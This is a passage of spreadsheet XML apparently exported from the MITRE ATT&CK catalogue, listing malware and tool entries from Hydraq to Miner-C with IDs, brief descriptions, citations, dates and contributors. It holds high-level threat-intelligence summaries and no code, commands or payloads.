    <t>[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0203</t>
  </si>
  <si>
    <t>06 January 2021</t>
  </si>
  <si>
    <t>9002 RAT, Aurora</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0398</t>
  </si>
  <si>
    <t>09 July 2019</t>
  </si>
  <si>
    <t>S0537</t>
  </si>
  <si>
    <t>HyperStack</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0537</t>
  </si>
  <si>
    <t>02 December 2020</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0189</t>
  </si>
  <si>
    <t>31 March 2020</t>
  </si>
  <si>
    <t>S0483</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017.  [IcedID](https://attack.mitre.org/software/S0483)  has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0483</t>
  </si>
  <si>
    <t>14 August 2020</t>
  </si>
  <si>
    <t>S0434</t>
  </si>
  <si>
    <t>Imminent Monitor</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0434</t>
  </si>
  <si>
    <t>05 May 2020</t>
  </si>
  <si>
    <t>10 July 2020</t>
  </si>
  <si>
    <t>Jose Luis Sánchez Martinez</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0357</t>
  </si>
  <si>
    <t>Jacob Wilkin, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0259</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0260</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0231</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>S0581</t>
  </si>
  <si>
    <t>IronNetInjector</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0581</t>
  </si>
  <si>
    <t>24 February 2021</t>
  </si>
  <si>
    <t>13 April 2021</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>Ixeshe</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0015</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0389</t>
  </si>
  <si>
    <t>18 June 2019</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0044</t>
  </si>
  <si>
    <t>GAMEFISH, JKEYSKW, Sednit, Seduploader, SofacyCarberp, Trojan.Sofacy</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0201</t>
  </si>
  <si>
    <t>11 August 2020</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0163</t>
  </si>
  <si>
    <t>S0528</t>
  </si>
  <si>
    <t>Javali</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0528</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0215</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0271</t>
  </si>
  <si>
    <t>S0526</t>
  </si>
  <si>
    <t>KGH_SPY</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0526</t>
  </si>
  <si>
    <t xml:space="preserve">KGH_SPY </t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0156</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0356</t>
  </si>
  <si>
    <t>03 August 2020</t>
  </si>
  <si>
    <t>1.4</t>
  </si>
  <si>
    <t>Doron Karmi, @DoronKarmi</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0088</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0265</t>
  </si>
  <si>
    <t>S0585</t>
  </si>
  <si>
    <t>Kerrdown</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) is a downloader used by [APT32](https://attack.mitre.org/groups/G0050) to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0585</t>
  </si>
  <si>
    <t>02 March 2021</t>
  </si>
  <si>
    <t>S0487</t>
  </si>
  <si>
    <t>Kessel</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0487</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0387</t>
  </si>
  <si>
    <t>14 June 2019</t>
  </si>
  <si>
    <t>Bart Parys</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>Keydnap</t>
  </si>
  <si>
    <t>This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0276</t>
  </si>
  <si>
    <t>OSX/Keydnap</t>
  </si>
  <si>
    <t>S0599</t>
  </si>
  <si>
    <t>Kinsing</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0599</t>
  </si>
  <si>
    <t>S0437</t>
  </si>
  <si>
    <t>Kivars</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0437</t>
  </si>
  <si>
    <t>03 June 2020</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0250</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0162</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0236</t>
  </si>
  <si>
    <t>18 March 2020</t>
  </si>
  <si>
    <t>Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0042</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0349</t>
  </si>
  <si>
    <t>23 November 2020</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0395</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0211</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t xml:space="preserve">[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0362</t>
  </si>
  <si>
    <t>04 March 2019</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0397</t>
  </si>
  <si>
    <t>02 July 2019</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0372</t>
  </si>
  <si>
    <t>16 April 2019</t>
  </si>
  <si>
    <t>S0447</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0447</t>
  </si>
  <si>
    <t>14 May 2020</t>
  </si>
  <si>
    <t>18 May 2020</t>
  </si>
  <si>
    <t>S0582</t>
  </si>
  <si>
    <t>LookBack</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0582</t>
  </si>
  <si>
    <t>S0451</t>
  </si>
  <si>
    <t>LoudMiner</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0451</t>
  </si>
  <si>
    <t>01 September 2020</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0121</t>
  </si>
  <si>
    <t>S0532</t>
  </si>
  <si>
    <t>Lucifer</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0532</t>
  </si>
  <si>
    <t>16 November 2020</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0010</t>
  </si>
  <si>
    <t>Enfal</t>
  </si>
  <si>
    <t>S0500</t>
  </si>
  <si>
    <t>MCMD</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0500</t>
  </si>
  <si>
    <t>13 August 2020</t>
  </si>
  <si>
    <t>20 August 2020</t>
  </si>
  <si>
    <t>S0443</t>
  </si>
  <si>
    <t>MESSAGETAP</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0443</t>
  </si>
  <si>
    <t>11 May 2020</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0233</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0282</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0409</t>
  </si>
  <si>
    <t>13 September 2019</t>
  </si>
  <si>
    <t>Pyark</t>
  </si>
  <si>
    <t>Matias Nicolas Porolli, ESET</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0413</t>
  </si>
  <si>
    <t>05 October 2019</t>
  </si>
  <si>
    <t>Azure AD, Office 365, Windows</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>Matryoshka</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0167</t>
  </si>
  <si>
    <t>S0449</t>
  </si>
  <si>
    <t>Maze</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0449</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>S0459</t>
  </si>
  <si>
    <t>MechaFlounder</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0459</t>
  </si>
  <si>
    <t>27 May 2020</t>
  </si>
  <si>
    <t>28 May 2020</t>
  </si>
  <si>
    <t>S0576</t>
  </si>
  <si>
    <t>MegaCortex</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0576</t>
  </si>
  <si>
    <t>S0530</t>
  </si>
  <si>
    <t>Melcoz</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0530</t>
  </si>
  <si>
    <t>S0455</t>
  </si>
  <si>
    <t>Metamorfo</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly Brazilian users.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0455</t>
  </si>
  <si>
    <t>Chen Erlich, @chen_erlich, enSilo</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0339</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0179</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0002</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)</t>
  </si>
  <si>
